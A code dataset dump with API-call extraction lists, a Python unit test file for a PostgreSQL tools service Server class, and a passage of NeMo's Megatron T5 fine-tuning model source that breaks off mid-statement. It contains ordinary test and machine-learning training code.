((9123, 9157), 'utils.robust_l1', 'robust_l1', (['(1 - valid_pixels)'], {'q': 'qch'}), '(1 - valid_pixels, q=qch)\n', (9132, 9157), False, 'from utils import robust_l1, logical_or, weighted_binary_cross_entropy\n'), ((13437, 13465), 'torch.abs', 'torch.abs', (['image_gradients_x'], {}), '(image_gradients_x)\n', (13446, 13465), False, 'import torch\n'), ((13525, 13553), 'torch.abs', 'torch.abs', (['image_gradients_y'], {}), '(image_gradients_y)\n', (13534, 13553), False, 'import torch\n'), ((16638, 16660), 'torch.median', 'torch.median', (['valid_gt'], {}), '(valid_gt)\n', (16650, 16660), False, 'import torch\n'), ((17056, 17071), 'torch.abs', 'torch.abs', (['diff'], {}), '(diff)\n', (17065, 17071), False, 'import torch\n'), ((18488, 18503), 'torch.abs', 'torch.abs', (['diff'], {}), '(diff)\n', (18497, 18503), False, 'import torch\n'), ((2735, 2757), 'utils.robust_l1', 'robust_l1', (['diff'], {'q': 'qch'}), '(diff, q=qch)\n', (2744, 2757), False, 'from utils import robust_l1, logical_or, weighted_binary_cross_entropy\n'), ((5488, 5510), 'utils.robust_l1', 'robust_l1', (['diff'], {'q': 'qch'}), '(diff, q=qch)\n', (5497, 5510), False, 'from utils import robust_l1, logical_or, weighted_binary_cross_entropy\n'), ((6338, 6351), 'torch.ones', 'torch.ones', (['(1)'], {}), '(1)\n', (6348, 6351), False, 'import torch\n'), ((9061, 9083), 'utils.robust_l1', 'robust_l1', (['diff'], {'q': 'qch'}), '(diff, q=qch)\n', (9070, 9083), False, 'from utils import robust_l1, logical_or, weighted_binary_cross_entropy\n')]
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import re
import unittest
import unittest.mock as mock
import urllib.parse as parse
import inflection
from ossdbtoolsservice.driver.types.psycopg_driver import PostgreSQLConnection
from pgsmo.objects.database.database import Database
from pgsmo.objects.server.server import Server
from smo.common.node_object import NodeCollection, NodeLazyPropertyCollection
from tests.pgsmo_tests.utils import MockPGServerConnection
from tests.utils import MockPsycopgConnection
class TestServer(unittest.TestCase):
CHECK_RECOVERY_ROW = {
'inrecovery': True,
'isreplaypaused': True
}
def test_init(self):
# If: I construct a new server object
host = 'host'
port = '1234'
dbname = 'dbname'
mock_conn = MockPGServerConnection(None, name=dbname, host=host, port=port)
server = Server(mock_conn)
# Then:
# ... The assigned properties should be assigned
self.assertIsInstance(server._conn, MockPGServerConnection)
self.assertIsInstance(server.connection, MockPGServerConnection)
self.assertIs(server.connection, mock_conn)
self.assertEqual(server._host, host)
self.assertEqual(server.host, host)
self.assertEqual(server._port, port)
self.assertEqual(server.port, port)
self.assertEqual(server._maintenance_db_name, dbname)
self.assertEqual(server.maintenance_db_name, dbname)
self.assertTupleEqual(server.version, server._conn.server_version)
# ... Recovery options should be a lazily loaded thing
self.assertIsInstance(server._recovery_props, NodeLazyPropertyCollection)
for key, collection in server._child_objects.items():
# ... The child object collection a NodeCollection
self.assertIsInstance(collection, NodeCollection)
# ... There should be a property mapped to the node collection
prop = getattr(server, inflection.pluralize(key.lower()))
self.assertIs(prop, collection)
def test_recovery_properties(self):
# Setup:
# NOTE: We're *not* mocking out the template rendering b/c this will verify that there's a template
# ... Create a mock query execution that will return the properties
mock_exec_dict = mock.MagicMock(return_value=([], [TestServer.CHECK_RECOVERY_ROW]))
# ... Create an instance of the class and override the connection
mock_connection = MockPsycopgConnection({'host': 'host', 'dbname': 'dbname'})
with mock.patch('psycopg2.connect', new=mock.Mock(return_value=mock_connection)):
pg_connection = PostgreSQLConnection({})
pg_connection.execute_dict = mock_exec_dict
obj = Server(pg_connection)
# If: I retrieve all the values in the recovery properties
# Then:
# ... The properties based on the properties should be availble
self.assertEqual(obj.in_recovery, TestServer.CHECK_RECOVERY_ROW['inrecovery'])
self.assertEqual(obj.wal_paused, TestServer.CHECK_RECOVERY_ROW['isreplaypaused'])
def test_maintenance_db(self):
# Setup:
# ... Create a server object that has a connection
obj = Server(MockPGServerConnection(None, name='dbname'))
# ... Mock out the database lazy loader's indexer
mock_db = {}
mock_db_collection = mock.Mock()
mock_db_collection.__getitem__ = mock.MagicMock(return_value=mock_db)
obj._child_objects[Database.__name__] = mock_db_collection
# If: I retrieve the maintenance db for the server
maintenance_db = obj.maintenance_db
# Then:
# ... It must have come from the mock handler
self.assertIs(maintenance_db, mock_db)
obj._child_objects[Database.__name__].__getitem__.assert_called_once_with('dbname')
def test_refresh(self):
# Setup:
# ... Create a server object that has a connection
obj = Server(MockPGServerConnection())
# ... Mock out the reset methods on the various collections
obj.databases.reset = mock.MagicMock()
obj.roles.reset = mock.MagicMock()
obj.tablespaces.reset = mock.MagicMock()
obj._recovery_props.reset = mock.MagicMock()
# If: I refresh the server
obj.refresh()
# Then: The collections should have been reset
obj.databases.reset.assert_called_once()
obj.roles.reset.assert_called_once()
obj.tablespaces.reset.assert_called_once()
obj._recovery_props.reset.assert_called_once()
def test_urn_base(self):
# Setup:
# ... Create a server object that has a connection
server = Server(MockPGServerConnection())
# If: I get the URN base for the server
urn_base = server.urn_base
# Then: The urn base should match the expected outcome
urn_base_regex = re.compile(r'//(?P<user>.+)@(?P<host>.+):(?P<port>\d+)')
urn_base_match = urn_base_regex.match(urn_base)
self.assertIsNotNone(urn_base_match)
self.assertEqual(urn_base_match.groupdict()['user'], server.connection.user_name)
self.assertEqual(urn_base_match.groupdict()['host'], server.host)
self.assertEqual(urn_base_match.groupdict()['port'], server.port)
def test_get_obj_by_urn_empty(self):
# Setup: Create a server object
server = Server(MockPGServerConnection())
test_cases = [None, '', '\t \n\r']
for test_case in test_cases:
with self.assertRaises(ValueError):
# If: I get an object by its URN without providing a URN
# Then: I should get an exception
server.get_object_by_urn(test_case)
def test_get_obj_by_urn_wrong_server(self):
# Setup: Create a server object
server = Server(MockPGServerConnection())
with self.assertRaises(ValueError):
# If: I get an object by its URN with a URN that is invalid for the server
# Then: I should get an exception
invalid_urn = '//this<EMAIL>.wrong.urn:456/Database.123/'
server.get_object_by_urn(invalid_urn)
def test_get_obj_by_urn_wrong_collection(self):
# Setup: Create a server object
server = Server(MockPGServerConnection())
with self.assertRaises(ValueError):
# If: I get an object by its URN with a URN that points to an invalid path off the server
# Then: I should get an exception
invalid_urn = parse.urljoin(server.urn_base, 'Datatype.123/')
server.get_object_by_urn(invalid_urn)
def test_get_obj_by_urn_success(self):
# Setup: Create a server with a database under it
server = Server(MockPGServerConnection())
mock_db = Database(server, 'test_db')
mock_db._oid = 123
server._child_objects[Database.__name__] = {123: mock_db}
# If: I get an object by its URN
urn = parse.urljoin(server.urn_base, '/Database.123/')
obj = server.get_object_by_urn(urn)
# Then: The object I get back should be the same as the object I provided
self.assertIs(obj, mock_db)
|
[
"tests.utils.MockPsycopgConnection",
"urllib.parse.urljoin",
"unittest.mock.MagicMock",
"ossdbtoolsservice.driver.types.psycopg_driver.PostgreSQLConnection",
"pgsmo.objects.database.database.Database",
"unittest.mock.Mock",
"pgsmo.objects.server.server.Server",
"tests.pgsmo_tests.utils.MockPGServerConnection",
"re.compile"
] |
[((1105, 1168), 'tests.pgsmo_tests.utils.MockPGServerConnection', 'MockPGServerConnection', (['None'], {'name': 'dbname', 'host': 'host', 'port': 'port'}), '(None, name=dbname, host=host, port=port)\n', (1127, 1168), False, 'from tests.pgsmo_tests.utils import MockPGServerConnection\n'), ((1186, 1203), 'pgsmo.objects.server.server.Server', 'Server', (['mock_conn'], {}), '(mock_conn)\n', (1192, 1203), False, 'from pgsmo.objects.server.server import Server\n'), ((2638, 2704), 'unittest.mock.MagicMock', 'mock.MagicMock', ([], {'return_value': '([], [TestServer.CHECK_RECOVERY_ROW])'}), '(return_value=([], [TestServer.CHECK_RECOVERY_ROW]))\n', (2652, 2704), True, 'import unittest.mock as mock\n'), ((2806, 2865), 'tests.utils.MockPsycopgConnection', 'MockPsycopgConnection', (["{'host': 'host', 'dbname': 'dbname'}"], {}), "({'host': 'host', 'dbname': 'dbname'})\n", (2827, 2865), False, 'from tests.utils import MockPsycopgConnection\n'), ((3075, 3096), 'pgsmo.objects.server.server.Server', 'Server', (['pg_connection'], {}), '(pg_connection)\n', (3081, 3096), False, 'from pgsmo.objects.server.server import Server\n'), ((3717, 3728), 'unittest.mock.Mock', 'mock.Mock', ([], {}), '()\n', (3726, 3728), True, 'import unittest.mock as mock\n'), ((3770, 3806), 'unittest.mock.MagicMock', 'mock.MagicMock', ([], {'return_value': 'mock_db'}), '(return_value=mock_db)\n', (3784, 3806), True, 'import unittest.mock as mock\n'), ((4439, 4455), 'unittest.mock.MagicMock', 'mock.MagicMock', ([], {}), '()\n', (4453, 4455), True, 'import unittest.mock as mock\n'), ((4482, 4498), 'unittest.mock.MagicMock', 'mock.MagicMock', ([], {}), '()\n', (4496, 4498), True, 'import unittest.mock as mock\n'), ((4531, 4547), 'unittest.mock.MagicMock', 'mock.MagicMock', ([], {}), '()\n', (4545, 4547), True, 'import unittest.mock as mock\n'), ((4584, 4600), 'unittest.mock.MagicMock', 'mock.MagicMock', ([], {}), '()\n', (4598, 4600), True, 'import unittest.mock as mock\n'), ((5244, 5300), 're.compile', 're.compile', (['"""//(?P<user>.+)@(?P<host>.+):(?P<port>\\\\d+)"""'], {}), "('//(?P<user>.+)@(?P<host>.+):(?P<port>\\\\d+)')\n", (5254, 5300), False, 'import re\n'), ((7143, 7170), 'pgsmo.objects.database.database.Database', 'Database', (['server', '"""test_db"""'], {}), "(server, 'test_db')\n", (7151, 7170), False, 'from pgsmo.objects.database.database import Database\n'), ((7320, 7368), 'urllib.parse.urljoin', 'parse.urljoin', (['server.urn_base', '"""/Database.123/"""'], {}), "(server.urn_base, '/Database.123/')\n", (7333, 7368), True, 'import urllib.parse as parse\n'), ((2984, 3008), 'ossdbtoolsservice.driver.types.psycopg_driver.PostgreSQLConnection', 'PostgreSQLConnection', (['{}'], {}), '({})\n', (3004, 3008), False, 'from ossdbtoolsservice.driver.types.psycopg_driver import PostgreSQLConnection\n'), ((3563, 3606), 'tests.pgsmo_tests.utils.MockPGServerConnection', 'MockPGServerConnection', (['None'], {'name': '"""dbname"""'}), "(None, name='dbname')\n", (3585, 3606), False, 'from tests.pgsmo_tests.utils import MockPGServerConnection\n'), ((4314, 4338), 'tests.pgsmo_tests.utils.MockPGServerConnection', 'MockPGServerConnection', ([], {}), '()\n', (4336, 4338), False, 'from tests.pgsmo_tests.utils import MockPGServerConnection\n'), ((5045, 5069), 'tests.pgsmo_tests.utils.MockPGServerConnection', 'MockPGServerConnection', ([], {}), '()\n', (5067, 5069), False, 'from tests.pgsmo_tests.utils import MockPGServerConnection\n'), ((5746, 5770), 'tests.pgsmo_tests.utils.MockPGServerConnection', 'MockPGServerConnection', ([], {}), '()\n', (5768, 5770), False, 'from tests.pgsmo_tests.utils import MockPGServerConnection\n'), ((6189, 6213), 'tests.pgsmo_tests.utils.MockPGServerConnection', 'MockPGServerConnection', ([], {}), '()\n', (6211, 6213), False, 'from tests.pgsmo_tests.utils import MockPGServerConnection\n'), ((6630, 6654), 'tests.pgsmo_tests.utils.MockPGServerConnection', 'MockPGServerConnection', ([], {}), '()\n', (6652, 6654), False, 'from tests.pgsmo_tests.utils import MockPGServerConnection\n'), ((6875, 6922), 'urllib.parse.urljoin', 'parse.urljoin', (['server.urn_base', '"""Datatype.123/"""'], {}), "(server.urn_base, 'Datatype.123/')\n", (6888, 6922), True, 'import urllib.parse as parse\n'), ((7099, 7123), 'tests.pgsmo_tests.utils.MockPGServerConnection', 'MockPGServerConnection', ([], {}), '()\n', (7121, 7123), False, 'from tests.pgsmo_tests.utils import MockPGServerConnection\n'), ((2914, 2953), 'unittest.mock.Mock', 'mock.Mock', ([], {'return_value': 'mock_connection'}), '(return_value=mock_connection)\n', (2923, 2953), True, 'import unittest.mock as mock\n')]
|
# Copyright (c) 2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import torch
from omegaconf import DictConfig, ListConfig
from pytorch_lightning.trainer.trainer import Trainer
from nemo.collections.common.data import ConcatDataset
from nemo.collections.common.metrics import MetricStringToTorchMetric
from nemo.collections.common.metrics.classification_accuracy import ExactStringPerCategoryMatchMetric
from nemo.collections.nlp.data.common.sequence_to_sequence_dataset import SequenceToSequenceDataset
from nemo.collections.nlp.models.language_modeling.megatron_t5_model import MegatronT5Model
from nemo.collections.nlp.parts.nlp_overrides import GlobalBatchDataFetcher
from nemo.utils import AppState, logging
try:
from apex.transformer import parallel_state
from apex.transformer.pipeline_parallel.utils import _reconfigure_microbatch_calculator, get_num_microbatches
HAVE_APEX = True
except (ImportError, ModuleNotFoundError):
HAVE_APEX = False
__all__ = ['MegatronT5FinetuneModel']
class MegatronT5FinetuneModel(MegatronT5Model):
"""Finetune Model that Inherits from MegatronT5Model instead."""
def __init__(self, cfg: DictConfig, trainer: Trainer):
super().__init__(cfg, trainer=trainer)
self.val_metric, self.val_metric_name = self.setup_metric(self.cfg.data.validation_ds)
self.val_metric = torch.nn.ModuleList(self.val_metric)
if hasattr(self.cfg.data, "test_ds"):
self.test_metric, self.test_metric_name = self.setup_metric(self.cfg.data.test_ds)
self.test_metric = torch.nn.ModuleList(self.test_metric)
def setup_metric(self, data_cfg):
# XNLI is a special case.
metric_name = "exact_string_match"
if hasattr(self.cfg, "eval_languages"):
metric = [ExactStringPerCategoryMatchMetric(self.cfg.eval_languages)]
else:
if not hasattr(data_cfg, "metric"):
metric = MetricStringToTorchMetric["exact_string_match"]
else:
if not hasattr(data_cfg.metric, "name"):
raise ValueError("Metric name is not provided in the metric config.")
if data_cfg.metric.name not in MetricStringToTorchMetric:
raise KeyError(
f"{data_cfg.metric.name} is not supported. List of supported metrics: {MetricStringToTorchMetric.keys()}"
)
metric_name = data_cfg.metric.name
metric = MetricStringToTorchMetric[metric_name]
# GLUE will not have a "src_file_name" attribute and will always have only a single metric.
if hasattr(data_cfg, "src_file_name"):
if isinstance(data_cfg.src_file_name, ListConfig):
# We pass average and num_classes to the metric constructor via kwargs even if they don't exist for each metric.
metric = [
metric(average=data_cfg.metric.average, num_classes=data_cfg.metric.num_classes)
for _ in range(len(self.cfg.data.test_ds.src_file_name))
]
else:
metric = [metric(average=data_cfg.metric.average, num_classes=data_cfg.metric.num_classes)]
else:
metric = [metric()] # GLUE does need to specify average or num_classes.
return metric, metric_name
def setup(self, stage=None):
# This is just to keep the parent class happy since we override its setup() method.
self.init_consumed_samples = 0
self.init_global_step = 0
if stage == 'predict':
return
# NOTE: PTL uses the same stage string "test" for both testing and validation.
self.build_train_valid_test_datasets(stage=stage)
if hasattr(self, '_validation_ds'):
self.setup_validation_data()
if hasattr(self, '_test_ds'):
self.setup_test_data()
if hasattr(self, '_train_ds'):
self.setup_training_data()
def _process_global_batch(self, global_batch):
"""Process a list of microbatches into a global batch."""
# If there is no language information in the global batch (ex: English MNLI), we can use the parent global batch processor as is.
if 'lang' not in global_batch[0]:
return self._process_global_batch_without_megatron_batch_sampler(global_batch)
# For validation data (XNLI), we need to process the global batch and and then deal with language info separately.
else:
assert all(['lang' in micro_batch for micro_batch in global_batch])
langs_list = []
processed_global_batch = self._process_global_batch_without_megatron_batch_sampler(
[{k: v for k, v in micro_batch.items() if k != 'lang'} for micro_batch in global_batch]
)
for micro_batch in global_batch:
langs_list.extend(micro_batch['lang'])
processed_global_batch['lang'] = langs_list
return processed_global_batch
def on_validation_epoch_start(self):
app_state = AppState()
_reconfigure_microbatch_calculator(
rank=app_state.global_rank,
rampup_batch_size=None,
global_batch_size=self.cfg.data.validation_ds.global_batch_size,
micro_batch_size=self.cfg.data.validation_ds.micro_batch_size,
data_parallel_size=parallel_state.get_data_parallel_world_size(),
)
return super().on_validation_epoch_start()
def on_validation_epoch_end(self):
app_state = AppState()
if hasattr(self, "_train_ds"):
_reconfigure_microbatch_calculator(
rank=app_state.global_rank,
rampup_batch_size=None,
global_batch_size=self.cfg.data.train_ds.global_batch_size,
micro_batch_size=self.cfg.data.train_ds.micro_batch_size,
data_parallel_size=parallel_state.get_data_parallel_world_size(),
)
# When running `trainer.validate()`, the training dataset is not available.
else:
logging.warning('No training data found, reconfiguring microbatches based on validation batch sizes.')
_reconfigure_microbatch_calculator(
rank=app_state.global_rank,
rampup_batch_size=None,
global_batch_size=self.cfg.data.validation_ds.global_batch_size,
micro_batch_size=self.cfg.data.validation_ds.micro_batch_size,
data_parallel_size=parallel_state.get_data_parallel_world_size(),
)
return super().on_validation_epoch_end()
def training_step(self, batch, batch_idx):
micro_batch_size = batch[0]['text_enc'].size(0)
# This should happen only on the last batch of the dataset.
if micro_batch_size != self.cfg.data.train_ds.micro_batch_size:
app_state = AppState()
_reconfigure_microbatch_calculator(
rank=app_state.global_rank,
rampup_batch_size=None,
global_batch_size=micro_batch_size
* parallel_state.get_data_parallel_world_size()
* get_num_microbatches(),
micro_batch_size=micro_batch_size,
data_parallel_size=parallel_state.get_data_parallel_world_size(),
)
# At this point batch is a list of dictionaries where eatch dict is a microbatch.
# After the process_global_batch call, batch will be a single dictionary containing the global batch.
# This is required since the parent class expects a single global batch dictioanry.
batch = self._process_global_batch(batch)
return super().training_step(batch, batch_idx)
def cast_for_metric(self, pred, label, metric_name):
if metric_name == 'exact_string_match':
return pred, label
pred = pred.replace(' ', '')
label = label.replace(' ', '')
# Correlation metrics require casting to float.
if metric_name in ['pearson_corr_coef', 'spearman_corr_coef']:
# Text-to-text model predictions may not always be valid floating point numbers.
try:
pred = float(pred)
except ValueError:
pred = 0.0
try:
label = float(label)
except ValueError:
raise ValueError(f'Could not convert {label} to float.')
pred = torch.FloatTensor([pred]).to(self.device)
label = torch.FloatTensor([label]).to(self.device)
# Other metrics require casting to integers.
elif metric_name in ['accuracy', 'auc', 'auroc', 'average_precision', 'f1']:
# Text-to-text model predictions may not always be valid integers.
try:
pred = int(pred)
except ValueError:
pred = 0
try:
label = int(label)
except ValueError:
raise ValueError(f'Could not convert {label} to int.')
pred = torch.LongTensor([pred]).to(self.device)
label = torch.LongTensor([label]).to(self.device)
else:
raise ValueError(f'Metric {metric_name} not supported.')
return pred, label
def inference_step(self, batch, batch_idx, mode, dataloader_idx=0):
batch_has_lang_information = len(batch[0]) == 7
micro_batch_size = batch[0]['text_enc'].size(0)
# This should happen only on the last batch of the dataset.
if micro_batch_size != self.cfg.data.validation_ds.micro_batch_size:
app_state = AppState()
_reconfigure_microbatch_calculator(
rank=app_state.global_rank,
rampup_batch_size=None,
global_batch_size=micro_batch_size
* parallel_state.get_data_parallel_world_size()
* get_num_microbatches(),
micro_batch_size=micro_batch_size,
data_parallel_size=parallel_state.get_data_parallel_world_size(),
)
# At this point processed_batch is a list of dictionaries where eatch dict is a microbatch.
# After the process_global_batch call, processed_batch will be a single dictionary containing the global batch.
# This is required since the parent class expects a single global batch dictioanry.
processed_batch = self._process_global_batch(batch)
# Call parent validation step to get the loss.
# NOTE: There could be extra keys in the processed_batch dictionary such as "langs" for XNLI, this will be ignored in the parent class.
loss = super().validation_step(processed_batch, batch_idx)
predicted_token_ids, _ = self.decode(
tokens_enc=processed_batch['text_enc'], enc_mask=processed_batch['enc_mask'], num_tokens_to_generate=30
)
# Special ids to text function to handle stripping <eos> and special tokens with sentencepiece tokenizers.
preds_text = self.ids_to_text(predicted_token_ids)
labels_text = self.ids_to_text(processed_batch['labels'])
input_text = self.ids_to_text(processed_batch['text_enc'])
if not batch_has_lang_information:
categories = [None] * len(preds_text)
else:
categories = processed_batch['lang']
metric = self.val_metric[dataloader_idx] if mode == 'validation' else self.test_metric[dataloader_idx]
assert len(categories) == len(preds_text) == len(labels_text)
for _, (pred, label, category) in enumerate(zip(preds_text, labels_text, categories)):
# To compute metrics like pearson or spearman correlation, we need to cast the predicted string and labels to floats.
pred, label = self.cast_for_metric(
pred, label, self.val_metric_name if mode == 'validation' else self.test_metric_name
)
if batch_has_lang_information:
_ = metric(pred, label, category)
else:
_ = metric(pred, label)
return {
'loss': loss,
'preds': preds_text,
'labels': labels_text,
'categories': categories,
'inputs': input_text,
}
def ids_to_text(self, batch_ids):
batch_ids = batch_ids.cpu().numpy().tolist()
texts = []
for ids in batch_ids:
if self.tokenizer.eos_id in ids:
idx = ids.index(self.tokenizer.eos_id)
ids = ids[:idx]
# Legacy sentencepiece detokenization still preserves special tokens which messes up exact string match.
if hasattr(self.tokenizer, 'special_token_to_id'):
ids = [id for id in ids if id not in self.tokenizer.special_token_to_id.values()]
text = self.tokenizer.ids_to_text(ids)
texts.append(text)
return texts
def _determine_log_key(self, data_config, dataloader_idx, metric_name, mode):
# Function that determines whether to log based on the user provided name of the dataset or the dataloader index.
base_key = f"{mode}_{metric_name}_" if metric_name is not None else f"{mode}_"
# If the user provided names for each validation/test dataset, use those.
if hasattr(data_config, "names") and data_config.names is not None:
# With only a single validation/test dataset, the name is not a list.
if not isinstance(data_config.names, ListConfig):
name = data_config.names
else:
name = data_config.names[dataloader_idx]
return base_key + name
else:
return base_key + f"dataloader{dataloader_idx}"
def inference_epoch_end(self, outputs, mode, data_cfg):
# Parent class will handle logging of the loss.
if not outputs:
return
if isinstance(outputs[0], dict):
outputs = [outputs]
averaged_loss = []
averaged_metric = []
metric_name = self.val_metric_name if mode == 'validation' else self.test_metric_name
# Log metrics for each provided validation/test dataset.
for dataloader_idx, output in enumerate(outputs):
loss = super().validation_epoch_end([x['loss'] for x in output])
# Determine the key used to log the loss based on the user provided name of the dataset or the dataloader index.
loss_log_key = self._determine_log_key(data_cfg, dataloader_idx, "loss", mode)
# Determine the key used to log the eval metric based on the user provided name of the dataset or the dataloader index.
metric_log_key = self._determine_log_key(data_cfg, dataloader_idx, metric_name, mode)
self.log(loss_log_key, loss)
metric_object = (
self.val_metric[dataloader_idx] if mode == 'validation' else self.test_metric[dataloader_idx]
)
metric = metric_object.compute()
# Handle logging of GLUE/XNLI separately here. XNLI has a separate metric per language.
if isinstance(metric, dict):
# GLUE case:
if len(metric) == 1 and 'acc' in metric:
metric = metric['acc']
self.log(metric_log_key, metric)
logging.info(f"{mode} {metric_name}: {metric}")
# XNLI case where the metric dictionary contains the language and the computed metric as values.
else:
for k, v in metric.items():
if k != 'acc' and 'total' not in k:
self.log(metric_log_key + f'_{k}', v)
logging.info(f"{mode} {metric_name} lang {k} : {v}")
metric = metric['acc']
else:
self.log(metric_log_key, metric)
logging.info(f"{mode} {metric_name}: {metric}")
metric_object.reset()
averaged_loss.append(loss)
averaged_metric.append(metric)
# Write predictions, labels, and inputs to a file for each validation/test dataset.
if data_cfg.get("write_predictions_to_file", False):
# Check if the user provided a prefix path to the file(s) they want to write.
if not hasattr(data_cfg, "output_file_path_prefix") or data_cfg.output_file_path_prefix is None:
raise ValueError(
f"Cannot write predictions to file when output_file_path_prefix is not set or present in the yaml config file."
)
# Gather the outputs object from all data parallel ranks since we are using the DistributedSampler which splits data across DDP ranks.
gathered_outputs = [None for _ in range(self.world_size)]
torch.distributed.all_gather_object(
gathered_outputs,
[
{
'preds': x['preds'],
'labels': x['labels'],
'categories': x['categories'],
'inputs': x['inputs'],
}
for x in output
],
)
# Figure out what the suffix of the file should be.
filename_log_key = self._determine_log_key(data_cfg, dataloader_idx, None, mode)
# Keep a set of ground truths and inputs to write deduplicated predictions. Distributed Sampler may duplicate examples.
gt_inp_set = set()
deduplicated_outputs = {
'preds': [],
'labels': [],
'categories': [],
'inputs': [],
}
# PTL models have a self.global_rank attribute and we want to write to disk only on global rank 0.
if self.global_rank == 0:
for rank in range(0, self.world_size):
for batch in gathered_outputs[rank]:
for pred, label, input, category in zip(
batch['preds'], batch['labels'], batch['inputs'], batch['categories']
):
if input + label not in gt_inp_set:
gt_inp_set.add(input + label)
deduplicated_outputs['preds'].append(pred)
deduplicated_outputs['labels'].append(label)
deduplicated_outputs['categories'].append(category)
deduplicated_outputs['inputs'].append(input)
self.write_predictions_to_file(
deduplicated_outputs, f"{data_cfg.output_file_path_prefix}_{filename_log_key}"
)
torch.distributed.barrier()
# Logging of the averaged metrics:
averaged_loss = sum(averaged_loss) / len(averaged_loss)
averaged_metric = sum(averaged_metric) / len(averaged_metric)
# Handle case where metrics can be nan or inf. This can break checkpoint save/load.
if torch.isinf(averaged_metric) or torch.isnan(averaged_metric):
app_state = AppState()
monitor_mode = app_state.checkpoint_callback_params.mode
assert monitor_mode in ['min', 'max']
averaged_metric = 0.0 if monitor_mode == 'max' else 1e5
if mode == 'validation':
self.log("validation_loss", averaged_loss)
self.log(f"validation_{self.val_metric_name}", averaged_metric)
elif mode == 'test':
self.log("test_loss", averaged_loss)
self.log(f"test_{self.test_metric_name}", averaged_metric)
return averaged_loss, averaged_metric
def write_predictions_to_file(self, outputs, output_file_path_prefix):
with open(output_file_path_prefix + "_inputs_preds_labels.json", "w") as f_json:
json_output = {
"inputs": outputs["inputs"],
"preds": outputs["preds"],
"labels": outputs["labels"],
}
json.dump(json_output, f_json)
def validation_step(self, batch, batch_idx, dataloader_idx=0):
return self.inference_step(batch, batch_idx, 'validation', dataloader_idx)
def validation_epoch_end(self, outputs):
_ = self.inference_epoch_end(outputs, 'validation', self.cfg.data.validation_ds)
def test_step(self, batch, batch_idx, dataloader_idx=0):
return self.inference_step(batch, batch_idx, 'test', dataloader_idx)
def test_epoch_end(self, outputs):
_ = self.inference_epoch_end(outputs, 'test', self.cfg.data.test_ds)
def build_data_loader(
self,
dataset,
micro_batch_size,
global_batch_size,
shuffle,
num_workers,
pin_memory,
drop_last,
check_validation_interval,
):
"""Buld dataloader given an input dataset."""
if dataset is None:
return None
rank = parallel_state.get_data_parallel_rank()
world_size = parallel_state.get_data_parallel_world_size()
sampler = torch.utils.data.distributed.DistributedSampler(
dataset, num_replicas=world_size, rank=rank, shuffle=shuffle
)
# This check makes sure the val_check_interval is less than the number of global batches.
# Normally, PTL would do this check and properly account for gradient accumulation.
# But now, it is implicit in the apex fwd/bwd functions and so we need to check for this somewhere.
# The consequence of not doing this is that training loop will never run validation.
# NOTE: Prog bar is also broken as a result of this.
global_batch_size_per_gpu = micro_batch_size * get_num_microbatches()
if (
self.trainer.val_check_interval > (sampler.num_samples // global_batch_size_per_gpu)
and check_validation_interval
):
raise ValueError(
f"trainer.val_check_interval {self.trainer.val_check_interval} is > number of global batches {sampler.num_samples // global_batch_size}"
)
# Data loader. Note that batch size is the per GPU batch size.
return torch.utils.data.DataLoader(
dataset,
collate_fn=dataset.collate_fn,
sampler=sampler,
batch_size=micro_batch_size,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=drop_last,
)
def setup_training_data(self):
self._train_dl = self.build_data_loader(
self._train_ds,
micro_batch_size=self.cfg.data.train_ds.micro_batch_size,
global_batch_size=self.cfg.data.train_ds.global_batch_size,
shuffle=self.cfg.data.train_ds.shuffle,
num_workers=self.cfg.data.train_ds.num_workers,
pin_memory=self.cfg.data.train_ds.pin_memory,
drop_last=self.cfg.data.train_ds.drop_last,
check_validation_interval=True,
)
def setup_eval_data(self, datasets, data_cfg):
dataloaders = []
for dataset in datasets:
eval_dl = self.build_data_loader(
dataset,
micro_batch_size=data_cfg.micro_batch_size,
global_batch_size=data_cfg.global_batch_size,
shuffle=data_cfg.shuffle,
num_workers=data_cfg.num_workers,
pin_memory=data_cfg.pin_memory,
drop_last=data_cfg.drop_last,
check_validation_interval=False,
)
dataloaders.append(eval_dl)
return dataloaders
def setup_validation_data(self):
self._validation_dl = self.setup_eval_data(self._validation_ds, self.cfg.data.validation_ds)
def setup_test_data(self):
self._test_dl = self.setup_eval_data(self._test_ds, self.cfg.data.test_ds)
def _build_train_dataset(self, data_cfg):
"""Build the training dataset."""
if (
data_cfg.drop_last is False
and data_cfg.global_batch_size > data_cfg.micro_batch_size * parallel_state.get_data_parallel_world_size()
):
raise ValueError(
f"Cannot use drop_last=False in your training data with gradient accumulation found grad acc of {data_cfg.global_batch_size // (data_cfg.micro_batch_size * parallel_state.get_data_parallel_world_size())} with global_batch_size {data_cfg.global_batch_size}, micro_batch_size {data_cfg.micro_batch_size}, data parallel size {parallel_state.get_data_parallel_world_size()}"
)
datasets = []
# Determine if we are using a single dataset or a list of datasets.
is_src_list_config = isinstance(data_cfg.src_file_name, ListConfig)
is_tgt_list_config = isinstance(data_cfg.tgt_file_name, ListConfig)
if (is_src_list_config and not is_tgt_list_config) or (is_tgt_list_config and not is_src_list_config):
raise ValueError("src_list and tgt_list must both be either a ListConfig or a string. ")
if is_src_list_config:
if len(data_cfg.src_file_name) != len(data_cfg.tgt_file_name):
raise ValueError("src_file_name and tgt_file_name must have the same number of elements. ")
else:
data_cfg.src_file_name = [data_cfg.src_file_name]
data_cfg.tgt_file_name = [data_cfg.tgt_file_name]
for src, tgt in zip(data_cfg.src_file_name, data_cfg.tgt_file_name):
dataset = SequenceToSequenceDataset(
src_file_name=src,
tgt_file_name=tgt,
src_tokenizer=self.tokenizer,
tgt_tokenizer=self.tokenizer,
max_src_seq_length=data_cfg.max_src_seq_length,
max_tgt_seq_length=data_cfg.max_tgt_seq_length,
)
datasets.append(dataset)
if len(datasets) > 1:
dataset = ConcatDataset(
datasets=datasets,
sampling_technique=data_cfg.get('concat_sampling_technique', 'temperature'),
sampling_temperature=data_cfg.get('concat_sampling_temperature', 5),
sampling_probabilities=data_cfg.get(
